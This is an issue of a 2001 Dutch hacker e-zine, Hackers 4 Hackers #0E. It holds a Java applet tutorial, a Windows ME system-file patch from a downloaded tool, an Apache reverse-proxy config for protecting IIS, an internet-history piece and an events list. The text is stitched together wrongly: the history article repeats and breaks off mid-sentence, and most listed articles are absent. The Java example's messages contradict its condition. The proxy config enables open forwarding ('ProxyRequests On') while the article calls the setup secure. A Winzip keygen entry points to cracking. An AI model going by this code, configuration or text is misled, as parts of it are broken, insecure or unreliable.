Copy Link
Add to Bookmark
Report
Hackers 4 Hackers #0E
Hackers 4 Hackers Issue 0E, released on 21-04-2001
___ ___ _____ ___ ___
/ | \ / | | / | \
/ ~ \/ | |_/ ~ \
\ Y / ^ /\ Y /
\___|_ /\____ | \___|_ /
\/ |__| \/
+-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+
|h|a|c|k|e|r|s| |4| |h|a|c|k|e|r|s| |0|E|
+-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+
http://www.hackers4hackers.org
'21-04-2001'
Om je aan of af te melden bij de mailinglijst ga je naar www.hackers4hackers.org
Artikelen en dergelijke kun je mailen naar artikel@hackers4hackers.org. Vragen
kun je mailen naar de desbetreffende auteur of naar post@hackers4hackers.org.
Uitspraak:
[ Nynex: negatieve energie het gevoel dat je krijgt op zondagmiddag ]
[ om 4 uur als je in de gaten hebt dat je weekend voorbij is ]
Enkele interessante sites:
http://www.securitydatabase.net
http://www.security.nl
http://hier.is/Triples
http://www.whatis.com
http://viper.dmrt.com
http://www.klaphek.nl
http://www.hack.vuurwerk.nl
http://www.dsinet.org/hackfaq
http://www.startplaza.nu
http://www.dsinet.org
http://packetstorm.securify.com/docs/hack/i.only.replaced.index.html.txt
Leuke kanaaltjes op IRCnet:
#h4h
#hit2000
#nlcoders
01. Disclaimer................................................. (Redactie)
02. Inleiding.................................................. (Redactie)
03. Een inleiding in Java...................................... (Kubus)
04. REAL-dos modus terug krijgen in Windows.................... (Maco)
05. Incomming Proxy............................................ (Berry da Clown)
06. Winzip 8.0 Keygen.......................................... (Wez)
07. De geboorte van een netwerk:Internet (deel 1).............. (Ange|icuz)
08. Evenementen................................................ (Redactie)
09. Creatief met cookies....................................... (AlphaVersion)
10. Meetingverslag Arnhem 10-3-01.............................. (N|ghtHawk)
11. Base10 nummers en IP nummers............................... (Digi)
12. Kort....................................................... (Redactie)
13. Ginie.nl................................................... (Flip)
-------------------------------------------------------
01. Disclaimer
-------------------------------------------------------
We zijn niet verantwoordelijk voor datgene wat jullie met deze informatie doen.
Deze informatie dient alleen voor educatieve doeleinden. Als je in de problemen
komt, kan je ons niks verwijten. Gebruik maken van deze informatie kan strafbaar
zijn. Meningen van auteurs hoeven niet hetzelfde te zijn als die van de
redactie.
Correspondentie met de redactie is mogelijk per email :
Algemeen - h4h-redactie@hackers4hackers.org
Vragen e.d. - post@hackers4hackers.org
Artikelen - artikel@hackers4hackers.org
Asby (Hoofdredacteur) - asby@hackers4hackers.org
Berry (Website + Eind redactie) - berry@hackers4hackers.org
Ivo (Redactie + IRC Beheer) - ivo@hackers4hackers.org
Nighthawk (Redactie) - nighthawk@hackers4hackers.org
Tozz (Redactie) - tozz@hackers4hackers.org
Viper (Redactie) - viper@hackers4hackers.org
-------------------------------------------------------
02. Inleiding
-------------------------------------------------------
Is H4H dood? Dit is een vraag waar wij de laatste tijd veel mee geconfronteerd
worden… Ik kan iedereen die deze vraag stelt een simpel antwoord geven… NEE ;)
Nee. We zijn niet dood. De reden dat we al een tijdje geen H4H meer hebben
uitgegeven is dat we alleen nog echte hoogwaardige (ahum) artikelen willen
plaatsen, met andere woorden artikelen met inhoud. Naar onze mening vinden
mensen het niet erg wanneer H4H dus minder vaak gaat verschijnen maar dan wel
altijd een hoge kwaliteit heeft. En mochten de lezers, Jullie dus ;) toch vinden
dat we vaker moeten verschijnen dan is dat heel simpel op te lossen door ons
artikelen te sturen !
Verder is een deel van de redactie nog druk met neven activiteiten. En het is
aangezien we allen in de ICT sector werkzaam zijn voor ons toevallig met werk
ook een drukke periode en H4H moet voor ons in principe ook een hobby blijven.
Een van die "neven" activiteiten is het organiseren van een meeting. Dit keer
alleen geen meeting zoals voorgaande keren. Maar een meeting die zeker
"Evenement" genoemd mag worden. Hackers 4 Hackers gaat na de zomervakantie een
evenement organiseren in de stijl van een LAN Party. Het gaat een 3 daags
evenement worden. De locatie en omvang staan nog niet vast. Maar gedacht wordt
aan +- 300 tot 500 man. H4H gaat dit niet alleen doen. Maar we haken in op een
bestaand evenement en gaan voor een 2e doelgroep binnen dat evenement zorgen.
Het betreft hier de welbekende "Demo Scene" party "Bizarre", De bedoeling is dat
wij vanuit H4H een doelgroep "security related people" gaan vermaken op dit 3
daags evenement. Gedacht word dus aan verschillende competities en lezingen.
Vragen stellen hierover heeft nog weinig zin. Maar binnenkort zullen we een
mailing versturen naar iedereen als er meer bekend is. Dat het evenement
doorgaat is min of meer al zeker. Maar zoals gezegd maken we binnenkort meer
bekend. Mocht je denken dat je nou echt iets nuttigs kan bijdragen aan dit
evenement,dan denken wij aan een grote sponsor of het kunnen houden van een
degelijke lezing of iets dergelijks kan je Berry (berry@hackers4hackers.org) of
Viper (viper@hackers4hackers.org) wel mailen.
Wat je al wel alvast kan doen is aangeven dat je wil komen, dat kan op
www.bizarre.nl/h4h.
Overigens betekend dit alles niet dat wij niet meer aan kleine meetings gaan
doen. Ook dit jaar na het succes van vorig jaar gaan we weer een meeting op
pinkpop organiseren (www.pinkpop.nl 2 t/m 4 Juni). Aanmelden voor de meeting kan
je doen op het bekende meeting mail adres (meeting@hackers4hackers.org). Asby
heeft inmiddels al kaartjes gekocht, mocht je hier van gebruik willen maken laat
het dan even weten. Ook is het slim om gelijk je GSM nummer door te geven,
zodoende kunnen we je opsporen ;P op het festival.
Verder hebben we deze h4h maar gevuld met alles wat ons de afgelopen tijd aan
artikelen is binnen gekomen en zoals je ziet is dat niet zo gek veel als je
bedenkt dat ons laatste nummer rond 1 januari verscheen. Wij als redactie kunnen
ons niet voorstellen dat er van de ruim 1400 lezers niemand tijd heeft om een
keer een artikel te schrijven. Over iets wat interessant zou kunnen zijn. H4H is
opgericht om de verhalen / artikelen vanuit de "scene" naar de "scene" te
publiceren. Het is dus niet de bedoeling dat de redactie een heel blad vol gaat
schrijven.
Dit hoeft niet te betekenen dat H4H ophoud met bestaan, Zoals jullie zien zijn
we ook druk met evenementen. Maar een nummer uitbrengen kan alleen als er
voldoende materiaal is om het uit te brengen. Zoals we al aankondigde in het
vorige nummer gaan we h4h voortaan alleen laten verschijnen als we voldoende en
kwalitatieve artikelen hebben.
Tot zover deze inleiding,
Verder iedereen veel plezier met het lezen van de artikelen en ik hoop weer een
boel mensen te kunnen ontmoeten op 1 van de 2 op de planningstaande meetings !
Berry da Clown. (aka Bermuda)
Hackers4Hackers
-------------------------------------------------------
03. Een inleiding in Java
-------------------------------------------------------
Inleiding:
----------
De meeste mensen zullen wel eens van Java gehoord hebben.
Java is een vrij nieuwe OOP taal die tegenwoordig veel gebruikt wordt voor
internet. OOP staat voor Object Oriented Programming, of in andere woorden.
Java maakt gebruik van Objecten. In deze korte cursus wil ik jullie
kennis laten maken met de grond beginselen van Java en dus niet metbegrippen
als overerving en polymorfisme.
Java het aller begin:
---------------------
Wat heb je nodig om met java te beginnen.. een java compiler natuurlijk.
Deze zijn op internet te vinden voor de gene die even goed zoeken. Zoals ik
al zei, Java werkt met Objecten. Ook werkt Java met classes. Deze classes
zijn eigenlijk de bouwtekening voor een object. Aan dit object kun je
opdrachten geven door middel van het aanspreken van zijn methoden en
attributen
Java, de opbouw:
----------------
Een java programma heeft zoals een programma bij elke programmeer taal een
opbouw. Bij java is het de volgende:
---------------------------------------------------------
//importeer bibliotheken
import <bibliotheeknaam>
public class <programma naam> {
//declareer attributen: door gehele programma //aanroepbaar.
private int variabele1;
private int variabele2;
//constuctor: hier worden bijvoorbeeld knoppen //aangemaakt
public void init() {
//hier komen bv. knoppen en textfields
}
public void methode1 () {
//argoritme
}
public void paint(Graphics g) {
//hier komen de statements die iets op het //scherm tekenen.
}
}
------------------------------------------------------
Een paar voorbeelden:
---------------------
In de methode paint wordt "Graphics g" geladen. Deze Graphics g zorgt ervoor
dat er iets op het scherm getekend kan worden. Ik ken natuurlijk niet een
hele cursus java hier schrijven, daarom raad ik iedereen aan die
geintereseerd is, om een java compuler te downloaden en de helpfile eens
goed te lezen. Ik geef wel een aantal voorbeelden.
Om een tekst op het scherm te tekenen gebruik je de statement drawstring.
omdat deze op het scherm moet komen en we Graphics "g" hebben geladen, moet
drawstring hiermee verbonden worden. Verder moet de string en de positie
worden doorgegeven. Het uiteidelijke resultaat is dus:
public void paint(Graphics g) {
g.drawString("H4H Rulez",30,30);
}
Je kunt ook figuren tekenen door bijvoorbeeld g.drawRect te gebruiken. Je
krijgt dan:
public void paint(Graphics g) {
g.drawRect(20,20,30,50);
}
Met als parameters de x en y coordinaat en de lengte en breedte.
Een voorbeeld dat zoiets doet staat hieronder:
---------------------------------------------------------
import java.awt.*;
import java.applet.Applet; //we maken een applet
public class Voorbeeld extends Applet {
private int lengte;
private int breedte;
public void init() {
}
public void paint(Graphics g) {
lengte = 40;
breedte = 50;
g.drawRect(20,20,lengte,breedte);
}
}
---------------------------------------------------------
Voor de wat gevorderde programmeurs zal ik nu een voorbeeld geven van een
lus en een if statement.
een if statement en een lus die telt van 0 tot 10:
public void paint(Graphics g) {
for (int getal = 0 ; getal < 10 ; getal++) {
if (getal > 6) {
g.drawString("Het getal is kleiner dan 6",20,20);
g.drawString("Het getal is namelijk: " +
getal,40,40);
}
else {
g.drawString("Het getal is groter dan 5",20,20);
g.drawString("Het getal is namelijk: " +
getal,40,40);
}
}
}
Ik heb hier een for lus gebruikt. Er zijn ook while en do lussen die weer
andere eigenschappen hebben. Ook is hier een simpele if statement gebruikt
die kijkt of het getal
kleiner is dan 6.
Wat ik hier heb laten zien is slechts het aller begin van java programmeren.
Omdat java een OOP taal is is het krachtiger dan een niet-OOP taal zoals
bijvoorbeeld pascal. Als je verder gaat met java krijg je te maken met
overerving. We hebben dat al even gezien in het begin met "extends Applet".
Applet is een bestaande library waar we op verder gaan. Straks kun je ook
bijvoorbeeld een applet dier maken met de standaard eigenschappen van een
dier. Vervolgens kun je met: public class Hond extends Dier,
verder bouwen op de class Dier. Het mooie is dat je alle 2 de classes kan
gebruiken en dit applet ook nog verder uit kan breiden met andere dieren. Na
overerving komt polymorfisme om de hoek kijken waarmee je verschillende
objecten hetzelfde kunt aanroepen.
Ik hoop dat je met deze inleiding een intressen hebt gekregen in de
worderlijke wereld van java. Ik raad je aan om een compilder te downloaden
en een javaboek te kopen en gewoon te beginnen met deze mooie taal.
veel succes
Kubus
dekubus@hotmail.com
-------------------------------------------------------
04. REAL-dos modus terug krijgen in Windows ME
-------------------------------------------------------
1.Inleiding
2.Beginnen
1.Inleiding
Ik vindt het heel DOM van Microsoft om bij Windows ME geen REAL-dos
modus te ondersteunen.Vandaar dat ik dit hoofdstuk heb geschreven.
Het is niet moeilijk om dit te doen.Je hebt alleen enige ervaring nodig
met Ms-dos.
2.Beginnen
Om te beginnen moet je van het internet een bestand downloaden
op het adres: http://www.geocities.com/mfd4life_2000/
( Als dit adres niet klopt bestaat de Website niet meer !!, als dit het
geval is e-mail dan naar Napster1Droog@netscape.net )
Als je het bestand heb gedownload pak je het uit, en je gaat nu naar
Start en drukt op de knop RUN of UITVOEREN.Hier voer je in:
c:\windows\command.com
Als het goed is komt er nu een Dos-venster.
Nu moet je een backup maken van:
c:\windows\command.com
c:\windows\command\ebd\io.sys
c:\windows\system\regenv32.exe
Voor de genen voor wie dit te snel gaat voert in
cd\
md backup
copy c:\windows\command.com c:\backup
copy c:\windows\ebd\io.sys c:\backup
copy c:\windows\system\regenv32.exe c:\backup
Als je dit gedaan hebt moet je via het DOS-venster het
volgende invoeren:
attrib -r -h -s c:\windows\command.com
attrib -r -h -s c:\windows\command\ebd\io.sys
attrib -r -h -s c:\windows\system\regenv32.exe
Zo dat is klaar.Wat je nu moet doen is
c:\windows\command.com
c:\windows\command\ebd\io.sys
c:\windows\system\regenv32.exe
overkopieeren naar de map waar je het gedownloade bestand
hebt.Start als je dit gedaan hebt het gedownloade bestand
Winmedos.com als je dit programma gestart hebt kun je de
aanwijzingen volgen of je kunt het hier lezen.Je moet nu de
bestanden die in deze map staan terugzetten op hun orginele
locatie en als hij vraagt of je het wilt overkopieeren zeg je JA.
Als je dit gedaan hebt zie je als je je computer opstart dat er staat
Bezig met starten van de Windows Millennium-Noodopstart diskette...
Dit wordt veroorzaakt omdat het patchprogramma de bestanden heeft
gepatcht die normaal gesproken op een Windows ME opstartdiskette
staat.beter is het natuurlijk om ervoor te zorgen dat bij
het opstarten eerst een menu verschint met een aantal keuzes,zodat
u zelf kunt kiezen wat er moet worden opgestart.
Hoe je zo'n opstartmenu maak ziet u in het volgende hoofdstuk
over Real-DOS modus in Windows ME.....
To be continued...........
Maco 2000,
Napster1Droog@netscape.net
-------------------------------------------------------
05. Incomming Proxy
-------------------------------------------------------
Veel webservers zijn lek, Dit is een simpele conclusie als je om je heen kijkt..
Als je je vervolgens gaat afvragen waarom die webservers lek zijn is het vaak zo
dat ze niet op tijd geupgrade zijn...
Als je gaat kijken welk type webserver er vaak lek is dan zie je dat in bijna
alle gevallen het een Microsoft IIS server betreft. Terwijl er veel veiligere
servers bestaan zoal Apache onder Linux. Waarom ze deze veiligere servers dan
niet in plaats van de van de microsoft server inzetten is dan een vraag die je
jezelf dan kan stellen... Nou hier zijn vaak meerdere redenen voor. Beheers
technisch is een Microsoft server vaak makkelijker om te beheren en dus
goedkoper (geen hoog getraind personeel). Ook de standaard extra mogelijkheden
zoals "Frontpage" extenties en "Active Server Page's" maken de IIS server als
een zeer interesante keus. Ook soms bepaalde software oplossingen voor een
bedrijf verplichten hen er vaak toe om een Microsoft server er neer te zetten
(Denk hier bijvoorbeeld aan een Mainframe of ERP pakket dat een Webwinkel bevat
die in ASP geschreven is). Onvoldoende kennis van beveiligingen en de vele
mogelijkheden die een Microsoft IIS server standaard bied maken dit tot een
gevaarlijke combinatie. En als z'n server online staat kan deze vaak binnen
afzienbare tijd gehackt worden. Veel bedrijven denken met een Firewall of iets
dergelijks veilig te zijn... Tot op zekere hoogte is dat zo... Wat een Firewall
doet is niets anders als de poorten blokkeren.. Maar als je zelf je webserver
hebt staan en die wil jij voor internet beschikbaar maken dan zet je in de
Firewall de http poort (80) open en routeer je die naar je webserver in je
netwerk. Deze is dus een IIS server omdat de web pagina's in Frontpage en / of
Interdef gemaakt worden draait deze server de zogenaamde FrontPage Extenties. Er
worden nog regelmatig BUGS in deze extenties gevonden, Dus als deze niet
regelmatig dicht getimmerd wordt dan heb je binnen de kortste keren een server
staan die niet veilig is... En via die webserver zouden ze ook eventueel verder
het bedrijfs netwerk in kunnen komen. De schade is al gauw niet meer te
overzien.
Nou lijkt het allemaal heel simpel op te lossen door een Apache server onder
linux er neer te zetten en die web pagina's te copieeren via een Samba Share
ofzo. Dit werkt in de praktijk niet. Hier is de nodige Automatiserings kennis
voor nodig die een grafische vormgever vaak niet heeft, die immers met Frontpage
of Interdef de webpagina's maakt en laat staan dat het Webwinkel pakket op die
Linux server gaat draaien. Ook een als er een SQL server in het spel is en er
gebruik gemaakt wordt van zogenaamde COM objecten dan is het eigenlijk al
onmogelijk om dit op een Apache server te zetten zonder moeilijke ingrepen.
De meeste bedrijfen laten door deze reddennen Linux links liggen omdat het niet
aan hun oplossing voldoet en denken met een Microsoft server op dat moment wel
goed en veilig te zitten. Helaas bewijst de praktijk vaak het tegendeel en zelfs
Microsoft laat het wel eens achterwegen om zijn IIS te upgraden. Met alle
gevolgen van dien.
Een oplossing die niet voor de hand licht maar wel al deze problemen ondervangt
is een Proxy server. Niet eens zo moeilijk om op te zetten en onderhoud
technisch geen omkijken naar. Het neemt een heleboel server load van de
Microsoft IIS server weg, Het kan bijvoorbeeld een groot deel van de
afbeeldingen cachen. Maar nu zullen de meeste gelijk zeggen dat een Proxy daar
niet voor bedoeld is... Dat klopt, Een proxy is bedoeld om vanuit het bedrijf te
gaan surfen op het internet. Maar draai dit eens om en laat het internet via de
proxy binnen het bedrijf surfen. Wat er nu gebeurd is dat de Firewall alleen nog
naar de proxy hoeft te connecten. Deze vervolgens over het lan van de IIS server
de web pagina's haalt (of de ASP's aanroept) en als de proxy server bijvoorbeeld
een Apache webserver is dan is die nog veilig ook.
Nou moet een proxy vaak appart aangesproken worden en is het standaard geen
webserver. Omdat je altijd via de proxy een webserver aan spreekt en je moet dan
ook de URL ingeven waar je naar toe gaat. Nu kan je een proxy voor dit geval zo
gek krijgen dat je hem laat denken dat hij via een andere Proxy moet gaan...
Wat je vaak ziet in kleine bedrijven is bijvoorbeeld dat je in het bedrijf
zit... die hebben een kleine proxy server om naar buiten te gaan, Deze server
gaat vervolgens inbellen en maakt verbinding met de webproxy server van de
hosting provider. Als je dit om zou draaien kun je bijvoorbeeld zeggen dat
iemand vanaf internet verbinding maakt met jouw proxy server (die op poort 80,
de http poort staat) en deze vervolgens weer contact gaat maken met een volgende
proxy server, Dit is echter geen proxy server maar een Webserver en de truuk is
gelukt.
Klinkt heel simpel en logisch. En dat is het ook. Maar op deze manier kan er dus
op een veilige mannier een goed onderhoudbare webpagina op een Microsoft IIS
server draaien met alle toeters en bellen er aan, En geen enkele persoon kan via
internet direct op de IIS server komen en hem dus ook niet hacken.
Wat moet je daar technisch voor veranderen:
Niet zo gek veel, Ga er vanuit dat het bedrijf standaard een IIS server heeft
draaien met daarop de webpagina, SQL server en nog veel meer. In de Firewall
staat een Forward op poort 80 naar deze web server. Verander in de Firewall de
poort forward naar een Linux server die Apache webserver draait. En deze gaan we
configureren als Incomming Proxy server.
Zoals al eerder gezecht moet de proxy alle aangevraagde pagina's routeren naar
de webserver, Dit omdat hij niet aangeroepen word als proxy. Meerdere domein
namen op 1 server kan nog steeds, In de Apache webserver kunnen gewoon per
domein naam een proxy aangemaakt worden met zijn eigen cache directory.
Ik ga hier niet en detail uitleggen hoe je een Apache webserver moet op zetten
maar wel het meest belangrijke en dat is het deel bij de VirtualHost waar in de
proxy cache staat....
De Firewall heeft een IP nummer op internet, deze stuurd alle http aanvragen
door naar het interne ip nummer van de Proxy server.
De proxy server heeft in dit test geval een ip nummer "192.168.0.2",
De webserver (IIS) heeft een ip nummer "192.168.0.3".
In /etc/httpd/httpd.conf dient de volgende Vhost min of meer overgenomen te
worden.
<VirtualHost 192.168.0.2>
ServerAdmin admin@host.nl
DocumentRoot /wwwroot/test/docs
ServerName www.test.nl
ServerAlias test.nl
ServerAlias *.test.nl
ErrorLog /wwwroot/test/log/error_log
CustomLog /wwwroot/test/log/access_log common
ScriptAlias /cgi-bin/ "/wwwroot/test/cgi-bin/"
ProxyRequests On
ProxyVia Block
ProxyPass / http://192.168.0.3:80
CacheRoot "/var/cache/httpd"
CacheSize 5
CacheGcInterval 4
CacheMaxExpire 24
CacheLastModifiedFactor 0.1
CacheDefaultExpire 1
</VirtualHost>
Verder hoeft er niets aan de Webserver veranderd te worden.
Ik hoop dat je wat aan deze informatie gehad hebt. En onder het mom van "Maak
nederland veilig" hoop ik dat deze oplossing geimplementeerd gaat worden.
-------------------------------------------------------
06. Winzip 8.0 Keygen
-------------------------------------------------------
Missing....
-------------------------------------------------------
07. De geboorte van een netwerk:Internet (deel 1)
-------------------------------------------------------
Ik zal ff voor jullie de ontstaansgeschiedenis van Internet bespreken.
Als jullie die al kennen mogen jullie dit artikel overslaan.
In den beginne: 1962-1969
We bevinden ons in het begin van de jaren zestig. Om precies te zijn 1962.
Jack Kennedy was president van de VS, de Beatles hadden zojuist hen eerste
hitsingle opgenomen en Christa Speck, een ongelooflijke brunette uit Duitsland.
was Playmate of the Year.
Amerika floreerde, maar in de rest van de wereld begon het communisme zich
te verspreiden. Tegelijkertijd werden er wapens uitgevonden met een
verschikkelijke vernietigingskracht.
Omdat men voorbereid wilde zijn op een atoomoorlog, gaf de United States Air
Force een kleine groep onderzoekers een enorme opdracht: een communicatinetwerk
creeren dat bestand zou zijn tegen een nuclaire oorlog. Hun concept was
revolutionair: eem netwerk dat niet centraal werd beheerd. Als een (of honderd)
knooppunten van dit netwerk werden verwoest, zou het systeem nog altijd
functioneren. In principe kon dit netwerk (uitsluitend ontwikkeld voor militair
gebruik) de gevreesde Apocalyps overleven (ook al gold dit niet voor de mens
:)).
De persoon waaraan we het bestaan van Internet het meest te danken hebben,
is Paul Baran. In 1962 werkte Baran bij Rand Corporation, de denktank die de
opdracht had gekregen dit idee uit te werken. Baran stelde zich een netwerk voor
waarin alle computers met elkaar zouden kunnen communiceren. Dit was een
radicaal nieuw idee, dat op dat ogenblik het menselijke verstand verkomen te
boven ging. Baran besefte echter dat netwerken die centraal werden beheerd te
gemakkelijk konden worden uitgeschakeld. In zijn intuseen overbekende memorandum
(zoek het maar op :)),
On Distributed Communications: 1. Introduction to Distributed Communications
Network, schreef Baran het volgende:
Een netwerk dat centraal wordt beheerd, is duidelijk kwetsbaar, aangezien
Communicatie tussen eindstations niet meer mogelijk is zodra er een centraal
knooppunt verwoest wordt.
Baran verwees hier naar de structuur van de meeste computernetwerken op dat
moment. Netwerken waren toen nog gebaseerd op mainframes. Dat waren grote,
krachtige machines die centraal informatie beheerden. Gebruikers hadden toegang
tot die informatie via terminals waren verbonden met de mainframes. De gegevens
werden dus via een kabel van de terminal naar het mainframe gestuurd.
Het mainframe verspreidde deze informatie daarna naar andere terminals. Dit
was een uiterste efficiente netwerkmethode, maar hij had rampzalige gevolgen
voor de beveiliging. Zo konden de terminals niet rechtstreeks met elkaar
communiceren. Als het mainframe werd vernield, was ook het netwerk
uitgeschakeld. Hierdoor stonden de traditionele netwerken dus aan allerlei
gevaren bloot.
Baran had echter een eenvoudige oplossing, namelijk het ontwerp van een
netwerk waarin alle computers met elkaar konden communiceren. Dit structuur
vertoonde een sterk gelijkenis met het telefoonsysteem. Baran legde dit als
volgt uit:
In de praktijk bestaan communicatienetwerken uit een combinatie van ster-en
spinnenwebvormige onderdelen. Zo'n netwerk wordt soms een 'gedecentraliseerd'
netwerk genoemd, omdat men niet altijd hoeft te vertrouwen op een enkel punt in
het netwerk.
Baran had een systeem voor ogen waarin de gegevens dynamisch hun eigen pad
konden bepalen. Als de gegevens bijvoorbeeld problemen ondervonden op een van de
kruispunten van het Net, zouden ze gewoon een alternatieve route zoeken. Het
systeem was gebaseerd op bepaalde regels.
Een netwerkknoopunt zou een bericht bijvoorbeeld alleen maar accepteren als
er voldoende ruimte was om dat bericht op te slaan. Als alle lijnen op dat
ogenblik bezet waren, zou het bericht wachten tot er een nieuwe route
beschikbaar was. Op die manier zou het netwerk op een intelligente manier
gegevens kunnen uitwisselen. Baran schreef ook andere aspecten van het
netwerk, waaronder:
* de beveiliging
* een schema met prioriteiten (en apparaten om te voorkomen dat het netwerk
overbelast raakte)
* de vereiste hardware
* de kosten
Jammer genoeg was Baran zijn tijd ver vooruit met zijn ideeen. Het Pentagon
had weinig vertouwen in zulke radicale ideeen. Baran schreef een rapport dat uit
elf delen bestond voor autoriteiten van het ministerie van defensie, dat echter
prompt in de la verdween. Zoals later bleek, liep de geboorte van Internet door
deze kortzichtigheid van het Pentagon vertraging op, maar niet lang. Rond 1965
nam de druk opnieuw toe. Er werden fondsen vrijgemaakt om een gedecentraliseerd
computernetwerk te ontwikkelen en in 1969 werd dat netwerk realiteit. Dit
systeem werd ARPANET genoemd.
ARPANET was een eenvoudig netwerk. Het bestond uit links tussen computers in
vier academische instituten
(Stanford Research Institute, de universiteit van Utah, de universiteit van
Californie in Los Angeles en de universiteit van Californie in Santa Barbara).
Een van de computers was een DEC PDP-10. Deze antieke exemplaren zijn
tegenwoordig handiger als meubelstuk dan als computer. Ik vermeld de PDP-10 hier
echter, zodat ik het kan hebben over een andere legende uit de
computergeschiedenis.
Ongeveer op hetzelfde ogenblik was er een bedrijf in Washington dat
computertimesharing introduceerde. (dit was een systeem waarbij klanten
computertijd konden huren. Ze moesten daarvoor meestal per uur betalen)
Het bedrijf nam twee jonge, intelligente (hrmz dit had ik maar beter niet
moeten schrijven) mensen in dienst die software moesten testen. In ruil voor hun
diensten kregen de jongens gratis toegang tot een PDP-10. (Dit zou tegenwoordig
equivalent zijn van gratis toegang tot een particulaire BBS)
Jammer genoeg voor de jongens ging het bedrijf korte tijd later failliet,
maar de ervaring die ze er hebben opgedaan, zou hun leven ingrijpend veranderen.
Op dat ogenblik waren ze net oud genoeg voor de middelbare school. Op dit
ogenblik zijn het veertigers. Die twee jongens waren Bill Gates en Paul Allen.
Hoe dan ook, ARPANET ging bescheiden van start: het netwerk bestond uit
vier computers die via een telefoonlijn met elkaar waren verbonden. Dat was
toen nog een verbazingwekkende vinding. De eerste euforie rond ARPANET
verdween echter snel toen de technici ontdekten dat er wat problemen waren.
Een van die problemen was dat ze geen besturingssysteem hadden om het immense
netwerk te creeren dat Baran had bedacht.
Het voorval speelde hierin echter een belangrijke rol. Ergens in het midden
van de VS waren onderzoekers een obscuur besturingssysteem aan het ontwikkelen.
Hun onderzoekswerk vond op hetzelfde ogenblik plaats als het onstaan van ARPANET
en het zou de wereld voorgoed veranderen. Dit besturingssyteem zal ik in het
volgende deel bespreken, het besturingssyteem heet UNIX.
Als je nog de volledige memorandum en het rapport van Baran wilt lezen.
Kun je de documenten vinden op http://www.rand.org/publications/electronic.
Angelicus Cytrus Dominus aka Ange|icuz
angelicus_cytrus_dominus@hotmail.com
-------------------------------------------------------
08. Evenementen
-------------------------------------------------------
The human interace
URL: http://www.infocare.com
Datum: 26 april 2001
Locatie: Ede
--
Mobiel internet
URL: http://www.euroforum.nl/mobielinternet.htm
Datum: 26 en 27 april 2001
Locatie: Den Haag.
--
IT-architecture strategy
URL: www.marcusevansnl.com
Datum: 3 en 4 mei 2001
Locatie: Amsterdam
--
Testen van Webapplicaties
URL: www.pao-informatica.nl
Datum: 8 mei 2001
Locatie: Eindhoven
--
Nationaal congres asp forum Nederland
URL: www.aspforum.nl
Datum: 16 mei 2001
Locatie: Rotterdam
--
Linux 2001
URL: http://www.linux2001.nl/
Datum: 22 en 23 mei 2001
Locatie: De Reehorst, Ede
--
H4H Meeting PinkPop
URL: http://www.pinkpop.nl/
Datum: 2 tot en met 4 juni 2001
Locatie: Festival terrein, Landgraaf
--
Hackers at Large (HAL 2001)
URL: http://www.hal2001.org
Datum 10 tot en met 12 augustus 2001
Locatie: Campus Universiteit Twente
--
Dit zijn de evenementen voor de komende periode. Mochten we evenementen
gemist hebben en waarvan jij vindt dat ze er bij moeten staan mail dat dan naar
h4h-redactie@hackers4hackers.org
-------------------------------------------------------
07. De geboorte van een netwerk:Internet (deel 1)
-------------------------------------------------------
Ik zal ff voor jullie de ontstaansgeschiedenis van Internet bespreken.
Als jullie die al kennen mogen jullie dit artikel overslaan.
In den beginne: 1962-1969
We bevinden ons in het begin van de jaren zestig. Om precies te zijn 1962.
Jack Kennedy was president van de VS, de Beatles hadden zojuist hen eerste
hitsingle opgenomen en Christa Speck, een ongelooflijke brunette uit Duitsland.
was Playmate of the Year.
Amerika floreerde, maar in de rest van de wereld begon het communisme zich
te verspreiden. Tegelijkertijd werden er wapens uitgevonden met een
verschikkelijke vernietigingskracht.
Omdat men voorbereid wilde zijn op een atoomoorlog, gaf de United States Air
Force een kleine groep onderzoekers een enorme opdracht: een communicatinetwerk
creeren dat bestand zou zijn tegen een nuclaire oorlog. Hun concept was
revolutionair: eem netwerk dat niet centraal werd beheerd. Als een (of honderd)
knooppunten van dit netwerk werden verwoest, zou het systeem nog altijd
functioneren. In principe kon dit netwerk (uitsluitend ontwikkeld voor militair
gebruik) de gevreesde Apocalyps overleven (ook al gold dit niet voor de mens
:)).
De persoon waaraan we het bestaan van Internet het meest te danken hebben,
is Paul Baran. In 1962 werkte Baran bij Rand Corporation, de denktank die de
opdracht had gekregen dit idee uit te werken. Baran stelde zich een netwerk voor
waarin alle computers met elkaar zouden kunnen communiceren. Dit was een
radicaal nieuw idee, dat op dat ogenblik het menselijke verstand verkomen te
boven ging. Baran besefte echter dat netwerken die centraal werden beheerd te
gemakkelijk konden worden uitgeschakeld. In zijn intuseen overbekende memorandum
(zoek het maar op :)),
On Distributed Communications: 1. Introduction to Distributed Communications
Network, schreef Baran het volgende:
Een netwerk dat centraal wordt beheerd, is duidelijk kwetsbaar, aangezien
Communicatie tussen eindstations niet meer mogelijk is zodra er een centraal
knooppunt verwoest wordt.
Baran verwees hier naar de structuur van de meeste computernetwerken op dat
moment. Netwerken waren toen nog gebaseerd op mainframes. Dat waren grote,
krachtige machines die centraal informatie beheerden. Gebruikers hadden toegang
tot die informatie via terminals waren verbonden met de mainframes. De gegevens
werden dus via een kabel van de terminal naar het mainframe gestuurd.
Het mainframe verspreidde deze informatie daarna naar andere terminals. Dit
was een uiterste efficiente netwerkmethode, maar hij had rampzalige gevolgen
voor de beveiliging. Zo konden de terminals niet rechtstreeks met elkaar
communiceren. Als het mainframe werd vernield, was ook het netwerk
uitgeschakeld. Hierdoor stonden de traditionele netwerken dus aan allerlei
gevaren bloot.
Baran had echter een eenvoudige oplossing, namelijk het ontwerp van een
netwerk waarin alle computers met elkaar konden communiceren. Dit structuur
vertoonde een sterk gelijkenis met het telefoonsysteem. Baran legde dit als
volgt uit:
In de praktijk bestaan communicatienetwerken uit een combinatie van ster-en
spinnenwebvormige onderdelen. Zo'n netwerk wordt soms een 'gedecentraliseerd'
netwerk genoemd, omdat men niet altijd hoeft te vertrouwen op een enkel punt in
het netwerk.
Baran had een systeem voor ogen waarin de gegevens dynamisch hun eigen pad
konden bepalen. Als de gegevens bijvoorbeeld problemen ondervonden op een van de
kruispunten van het Net, zouden ze gewoon een alternatieve route zoeken. Het
systeem was gebaseerd op bepaalde regels.
Een netwerkknoopunt zou een bericht bijvoorbeeld alleen maar accepteren als
er voldoende ruimte was om dat bericht op te slaan. Als alle lijnen op dat
ogenblik bezet waren, zou het bericht wachten tot er een nieuwe route
beschikbaar was. Op die manier zou het netwerk op een intelligente manier
